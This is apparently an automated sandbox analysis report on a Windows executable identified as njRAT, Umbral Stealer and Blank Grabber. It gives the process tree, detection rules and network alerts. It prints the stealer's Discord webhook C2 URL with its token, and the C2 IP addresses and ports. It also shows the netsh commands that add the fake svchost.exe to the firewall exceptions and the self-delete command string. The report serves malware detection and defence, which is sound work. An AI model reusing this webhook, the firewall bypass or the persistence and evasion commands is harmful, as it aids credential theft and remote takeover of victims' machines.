Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KvS2rT08PQ.exe

Overview

General Information

Sample name:KvS2rT08PQ.exe
renamed because original name is a hash value
Original sample name:2784277bd68152abf75c6c6d59fab7af.exe
Analysis ID:1429103
MD5:2784277bd68152abf75c6c6d59fab7af
SHA1:e1d047c97e3bdfe273b215b42eccde32ca2ca63f
SHA256:737bba8d3e9ad3e1526bf5949962af3b37107c80c767c473a820999eae507fbc
Tags:exenjratRAT
Infos:

Detection

Blank Grabber, Njrat, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Blank Grabber
Yara detected Njrat
Yara detected Umbral Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to disable the Task Manager (.Net Source)
Contains functionality to spread to USB devices (.Net source)
Disables zone checking for all users
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KvS2rT08PQ.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\KvS2rT08PQ.exe" MD5: 2784277BD68152ABF75C6C6D59FAB7AF)
    • Umbral.exe (PID: 2180 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: 774FA31E76AF56BBAD395E1E3AC68721)
      • WMIC.exe (PID: 7212 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 6264 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 3071F4F7B11A6BF6C623E83EED6D2418)
      • netsh.exe (PID: 7296 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7412 cmdline: netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7420 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ANDYzz-protected.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe" MD5: 33EB68C8C4FC521D64ED82219CDB19F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "62b7d4736043995d94b02f8790cef504", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-", "Version": "v1.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_NjratYara detected NjratJoe Security
    C:\Users\user\AppData\Local\Temp\svchost.exeWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0x115d2:$a1: get_Registry
    • 0x15a37:$a2: SEE_MASK_NOZONECHECKS
    • 0x156d9:$a3: Download ERROR
    • 0x15c89:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x13c16:$a5: netsh firewall delete allowedprogram "
    C:\Users\user\AppData\Local\Temp\svchost.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
    • 0x15c89:$x1: cmd.exe /c ping 0 -n 2 & del "
    • 0x137a2:$s1: winmgmts:\\.\root\SecurityCenter2
    • 0x156f7:$s3: Executed As
    • 0x124f0:$s5: Stub.exe
    • 0x156d9:$s6: Download ERROR
    • 0x13764:$s8: Select * From AntiVirusProduct
    C:\Users\user\AppData\Local\Temp\svchost.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0x15a37:$reg: SEE_MASK_NOZONECHECKS
    • 0x156bd:$msg: Execute ERROR
    • 0x15711:$msg: Execute ERROR
    • 0x15c89:$ping: cmd.exe /c ping 0 -n 2 & del
    C:\Users\user\AppData\Local\Temp\svchost.exeMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
    • 0x13c16:$s1: netsh firewall delete allowedprogram
    • 0x13c68:$s2: netsh firewall add allowedprogram
    • 0x15c89:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
    • 0x156bd:$s4: Execute ERROR
    • 0x15711:$s4: Execute ERROR
    • 0x156d9:$s5: Download ERROR
    Click to see the 4 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
        00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NjratYara detected NjratJoe Security
            00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
            • 0x113d2:$a1: get_Registry
            • 0x15837:$a2: SEE_MASK_NOZONECHECKS
            • 0x154d9:$a3: Download ERROR
            • 0x15a89:$a4: cmd.exe /c ping 0 -n 2 & del "
            • 0x13a16:$a5: netsh firewall delete allowedprogram "
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.0.svchost.exe.e00000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
              2.0.svchost.exe.e00000.0.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
              • 0x115d2:$a1: get_Registry
              • 0x15a37:$a2: SEE_MASK_NOZONECHECKS
              • 0x156d9:$a3: Download ERROR
              • 0x15c89:$a4: cmd.exe /c ping 0 -n 2 & del "
              • 0x13c16:$a5: netsh firewall delete allowedprogram "
              2.0.svchost.exe.e00000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
              • 0x15c89:$x1: cmd.exe /c ping 0 -n 2 & del "
              • 0x137a2:$s1: winmgmts:\\.\root\SecurityCenter2
              • 0x156f7:$s3: Executed As
              • 0x124f0:$s5: Stub.exe
              • 0x156d9:$s6: Download ERROR
              • 0x13764:$s8: Select * From AntiVirusProduct
              2.0.svchost.exe.e00000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
              • 0x15a37:$reg: SEE_MASK_NOZONECHECKS
              • 0x156bd:$msg: Execute ERROR
              • 0x15711:$msg: Execute ERROR
              • 0x15c89:$ping: cmd.exe /c ping 0 -n 2 & del
              2.0.svchost.exe.e00000.0.unpackMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
              • 0x13c16:$s1: netsh firewall delete allowedprogram
              • 0x13c68:$s2: netsh firewall add allowedprogram
              • 0x15c89:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
              • 0x156bd:$s4: Execute ERROR
              • 0x15711:$s4: Execute ERROR
              • 0x156d9:$s5: Download ERROR
              Click to see the 6 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\KvS2rT08PQ.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
              Sigma detected: System File Execution Location Anomaly
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KvS2rT08PQ.exe", ParentImage: C:\Users\user\Desktop\KvS2rT08PQ.exe, ParentProcessId: 6500, ParentProcessName: KvS2rT08PQ.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 6264, ProcessName: svchost.exe

              Snort Signatures

              Timestamp:04/20/24-21:33:31.352663
              SID:2033132
              Source Port:49750
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:42.023350
              SID:2814860
              Source Port:49758
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:32.786647
              SID:2814860
              Source Port:49757
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:07.714188
              SID:2825564
              Source Port:49740
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:33:38.270894
              SID:2033132
              Source Port:49751
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:26.030819
              SID:2814856
              Source Port:49747
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:13.358970
              SID:2825564
              Source Port:49753
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:02.183024
              SID:2033132
              Source Port:49737
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:04.631394
              SID:2033132
              Source Port:49740
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:25.822297
              SID:2033132
              Source Port:49747
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:55.347737
              SID:2033132
              Source Port:49759
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:56.770839
              SID:2033132
              Source Port:49749
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:33:38.479570
              SID:2814856
              Source Port:49751
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:33:56.027448
              SID:2814856
              Source Port:49752
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:55.555682
              SID:2814856
              Source Port:49759
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:39.113591
              SID:2033132
              Source Port:49758
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:08.564113
              SID:2814856
              Source Port:49753
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:04.839656
              SID:2814856
              Source Port:49740
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:55.890076
              SID:2825564
              Source Port:49759
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:33:31.560459
              SID:2814856
              Source Port:49750
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:36:07.123314
              SID:2814856
              Source Port:49760
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:42.913707
              SID:2033132
              Source Port:49754
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:57.578337
              SID:2814860
              Source Port:49749
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:20.785425
              SID:2033132
              Source Port:49756
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:17.370363
              SID:2033132
              Source Port:49755
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:27.123609
              SID:2033132
              Source Port:49757
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:55.890076
              SID:2814860
              Source Port:49759
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:43.124036
              SID:2814856
              Source Port:49754
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:36:06.912000
              SID:2033132
              Source Port:49760
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:07.714188
              SID:2814860
              Source Port:49740
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:17.579185
              SID:2814856
              Source Port:49755
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:57.578337
              SID:2825564
              Source Port:49749
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:20.991740
              SID:2814856
              Source Port:49756
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:42.023350
              SID:2825564
              Source Port:49758
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:02.391022
              SID:2814856
              Source Port:49737
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:13.358970
              SID:2814860
              Source Port:49753
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:27.332080
              SID:2814856
              Source Port:49757
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:32.786647
              SID:2825564
              Source Port:49757
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:32:56.978717
              SID:2814856
              Source Port:49749
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:33:55.819529
              SID:2033132
              Source Port:49752
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:34:08.350949
              SID:2033132
              Source Port:49753
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-21:35:39.323225
              SID:2814856
              Source Port:49758
              Destination Port:19177
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: KvS2rT08PQ.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeAvira: detection malicious, Label: TR/Redcap.pwthy
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Found malware configuration
              Source: 1.0.Umbral.exe.253f8f30000.0.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-", "Version": "v1.3"}
              Source: 2.0.svchost.exe.e00000.0.unpackMalware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "62b7d4736043995d94b02f8790cef504", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
              Multi AV Scanner detection for domain / URL
              Source: 0.tcp.eu.ngrok.ioVirustotal: Detection: 16%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeReversingLabs: Detection: 50%
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeVirustotal: Detection: 64%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeReversingLabs: Detection: 87%
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeVirustotal: Detection: 70%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 100%
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeVirustotal: Detection: 77%Perma Link
              Multi AV Scanner detection for submitted file
              Source: KvS2rT08PQ.exeReversingLabs: Detection: 68%
              Source: KvS2rT08PQ.exeVirustotal: Detection: 71%Perma Link
              Yara detected Njrat
              Source: Yara matchFile source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: KvS2rT08PQ.exeJoe Sandbox ML: detected
              Source: KvS2rT08PQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
              Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: KvS2rT08PQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: !costura.discordrpc.pdb.compressed source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed|||DiscordRPC.pdb|447C1853EECA30637A94415F07CA7CD3E384746B|27868 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed source: ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed source: ANDYzz-protected.exe.0.dr
              Source: Binary string: 8costura.hardcodet.wpf.taskbarnotification.pdb.compressed source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed|||Hardcodet.Wpf.TaskbarNotification.pdb|0FF074905FAAB506531D68962300EAF21DAF3B05|97792 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed8 source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed source: ANDYzz-protected.exe.0.dr

              Spreading

              barindex
              Contains functionality to spread to USB devices (.Net source)
              Source: svchost.exe.0.dr, Usb1.cs.Net Code: infect
              Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: \autorun.inf
              Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
              Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
              Source: svchost.exe.0.drBinary or memory string: \autorun.inf
              Source: svchost.exe.0.drBinary or memory string: [autorun]
              Source: svchost.exe.0.drBinary or memory string: autorun.inf

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49737 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49737 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49740 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49740 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49740 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49740 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49747 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49747 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49749 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49749 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49749 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49749 -> 18.158.249.75:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49750 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49750 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49751 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49751 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49752 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49752 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49753 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49753 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49753 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49753 -> 3.125.209.94:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49754 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49754 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49755 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49755 -> 3.125.223.134:19177
